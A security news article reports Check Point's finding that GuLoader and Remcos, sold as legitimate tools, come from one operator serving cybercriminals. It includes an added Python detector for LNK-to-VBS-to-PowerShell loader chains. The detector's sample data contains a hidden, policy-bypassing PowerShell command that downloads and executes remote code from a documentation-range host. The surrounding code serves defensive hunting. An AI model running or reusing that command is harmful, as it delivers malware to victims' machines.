Two software products that present themselves as legitimate tools have turned out to be distributed by an operator working with malicious intent.
Use of these two tools, GuLoader (also known as CloudEyE Protector) and Remcos (marketed as a remote administration tool), by threat actors has been rising since the last quarter of 2022.
Although both tools are advertised as being for legitimate use only, their primary customers have been identified as cybercriminals. Antivirus solutions easily detect Remcos on its own, so GuLoader is used to wrap it and bypass that protection.
According to Check Point's findings, both tools were distributed through the Utopia project website, which was run by a single administrator.
That same administrator was also found to be running the BreakingSecurity website, the official site for the Remcos RAT, and its related Telegram channels.
This link makes clear that the sellers of Remcos and GuLoader know that cybercriminals routinely use their tools.
The seller of Remcos and GuLoader also works with malware families such as Amadey and Formbook, and uses GuLoader to get them past antivirus detection.
GuLoader & Remcos
GuLoader is a shellcode-based loader that employs multiple techniques to hinder both manual and automated malware analysis.
The most recent GuLoader version uses a multi-stage loading chain in which LNK files, VBS, and PowerShell scripts fetch code fragments from remote servers. According to the report, this approach achieved a zero-detection rate.
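As an added illustration (this code is not from the original article or from Check Point's report), the following Python hunts process-creation telemetry for the chain described above: a user-launched LNK whose target is a Windows Script Host running a VBS, which in turn spawns PowerShell that pulls code fragments from a remote server. The event format, PIDs, file paths and the 203.0.113.10 URLs are constructed sample data. The LNK file itself never appears as a process, so the check uses explorer.exe as the script host's parent as a proxy for a user double-click; that heuristic is an assumption, not something the report states.

```python
"""Hunt process-creation events for an LNK -> VBS -> PowerShell download chain."""
import re
from dataclasses import dataclass, field

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell idioms commonly used to pull code from a remote server
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring"
    r"|downloadfile|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass
class Finding:
    powershell_pid: int
    script_host_pid: int
    launched_from_explorer: bool   # heuristic for "user opened a shortcut"
    urls: list = field(default_factory=list)


def _name(path):
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_loader_chains(events):
    """Return a Finding for every PowerShell process that was spawned by a
    script host and whose command line fetches content from a remote URL."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if _name(ev.image) not in POWERSHELL:
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None or _name(parent.image) not in SCRIPT_HOSTS:
            continue
        if not DOWNLOAD_RE.search(ev.cmdline):
            continue
        grandparent = by_pid.get(parent.ppid)
        findings.append(Finding(
            powershell_pid=ev.pid,
            script_host_pid=parent.pid,
            launched_from_explorer=(grandparent is not None
                                    and _name(grandparent.image) == "explorer.exe"),
            urls=URL_RE.findall(ev.cmdline),
        ))
    return findings


# Constructed sample telemetry (not real logs); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    # user opens a .lnk whose target is wscript.exe running the dropped VBS
    ProcEvent(1200, 4, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\AppData\Local\Temp\inv0ice.vbs"'),
    # the VBS spawns PowerShell that fetches two code fragments and executes them
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX((New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/p1.txt'));IEX((New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/p2.txt'))\""),
    # benign: a local script run straight from the desktop, no script host in between
    ProcEvent(1400, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    # benign: a logon VBS spawns PowerShell but downloads nothing
    ProcEvent(1500, 4, r"C:\Windows\System32\cscript.exe", "cscript.exe //nologo logon.vbs"),
    ProcEvent(1600, 1500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for finding in find_loader_chains(SAMPLE_EVENTS):
        print(finding)
```

Only the wscript.exe to powershell.exe pair with DownloadString calls is reported; the benign PowerShell launches are not, because they either lack a script-host parent or fetch nothing remote. In a real deployment the same logic maps onto Sysmon Event ID 1 (ParentProcessId, Image, CommandLine) or equivalent EDR telemetry, and the extracted URLs feed straight into blocklists and retro-hunts.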
Remcos, introduced in 2016, is a well-known remote access tool marketed for the legitimate purpose of tracking and monitoring one's own systems.
In addition, Remcos offers functions such as password stealing, browser-history tracking, cookie theft, keylogging, and webcam control, which go beyond what a legitimate remote administration tool needs.
It is worth noting that Remcos was first advertised on hacking forums before it was marketed as legitimate software.
The revenue generated by underground sales of Remcos is estimated at $59,685.08, averaging about $15,000 a month.
Check Point has published a complete report on the relationship between these two tools, with details of the Telegram channel messages, social network links, revenue, indicators of compromise, and other information.